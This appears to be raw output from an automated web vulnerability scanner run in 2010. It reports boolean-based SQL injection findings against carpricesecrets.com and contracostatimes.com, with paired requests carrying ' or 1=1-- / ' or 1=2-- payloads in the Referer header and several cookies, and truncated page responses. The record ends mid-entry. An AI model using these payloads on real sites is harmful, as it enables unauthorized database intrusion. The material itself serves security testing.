<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Don't Miss Out on Year End Vehicle Sales!</title> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Script-Type" content="application/javascript" /> <meta name="description" content="New Vehicle Prices are at an All-Time Low!" /> <meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" /> <link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />
if (typeof(Local) === 'undefined') { var Local = {}; }
</script>
<!-- OPTIMOST PAGE CODE V2.7 - Copyright 2002-2008 Interwoven, Inc. --> <script language="javascript" type="text/javascript"><!-- var optimost={A:{},C:{},D:document,L:document.location,M:[ ],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA: {"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cookie;if(s.length>3){for(var a=s.substring(1) .split("&"),i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)this.Q[a[i].substring(0,p)]=unescape(a[i].substring( p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");while(v[0].substring(0, 1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)this.C[v[0]]=unescape(v[1]);}}},B:function(){var n;this.A={ };var _o=this;this.A.D_ts=Math.round(_o.T.getTime()/1000);this.A.D_tzo=_o.T.getTimezoneOffset();this.A.D_loc=_o.L.protocol+ "//"+_o.L.hostname+_o.L.pathname;this.A.D_ckl=_o.D.cookie.length;this.A.D_ref=_o.D.referrer;if(typeof optrial=="object") for(n in optrial)this.A[n]=optrial[n];for(n in this.Q)this.A[n]=this.Q[n];for(n in this.C)if(n.substring(0,2)=="op")this.A[n]= this.C[n];},S:functi ...[SNIP]...
Request 2
GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d2--%20 HTTP/1.1 Host: www.carpricesecrets.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:38:18 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: Apache=174.121.222.18.1291768698223179; path=/; expires=Tue, 03-Dec-30 00:38:18 GMT X-Powered-By: PHP/5.2.10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE" Set-Cookie: PHPSESSID=eppuftqhqhu6cu3jqgfom8v0e2; path=/; domain=www.carpricesecrets.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com Set-Cookie: landing_id=70445717; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27726
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest Mercury Price Quotes at CarPriceSecrets.com</title> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Script-Type" content="application/javascript" /> <meta name="description" content="CarPriceSecrets.com finds the lowest possible Mercury prices at your local Mercury dealers. We also reveal the secrets to negotiating your lowest possible price on a new Mercury. Our service is fast and free." /> <meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" /> <link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 16701620'%20or%201%3d1--%20 and 16701620'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /california/ci_16783052?nclick_check=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2; Referer: http://www.google.com/search?hl=en&q=16701620'%20or%201%3d1--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94603801'%20or%201%3d1--%20 and 94603801'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16759989?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2; Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d1--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" ...[SNIP]...
Request 2
GET /ci_16759989?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2; Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d2--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginter ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. The payloads 40344553'%20or%201%3d1--%20 and 40344553'%20or%201%3d2--%20 were each submitted in the UserType cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16774009?source=most_emailed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser40344553'%20or%201%3d1--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractiv ...[SNIP]...
Request 2
GET /ci_16774009?source=most_emailed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser40344553'%20or%201%3d2--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https ...[SNIP]...
The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16790597?source=most_emailed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other peoples mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/ ...[SNIP]...
Request 2
GET /ci_16790597?source=most_emailed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other peoples mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/ ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. The payloads 12191704'%20or%201%3d1--%20 and 12191704'%20or%201%3d2--%20 were each submitted in the fPage cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16790963?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d1--%20; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er ...[SNIP]...
Request 2
GET /ci_16790963?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d2--%20; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https://secure.www.contracostatime ...[SNIP]...
The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 43929352'%20or%201%3d1--%20 and 43929352'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16790963?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d1--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er ...[SNIP]...
Request 2
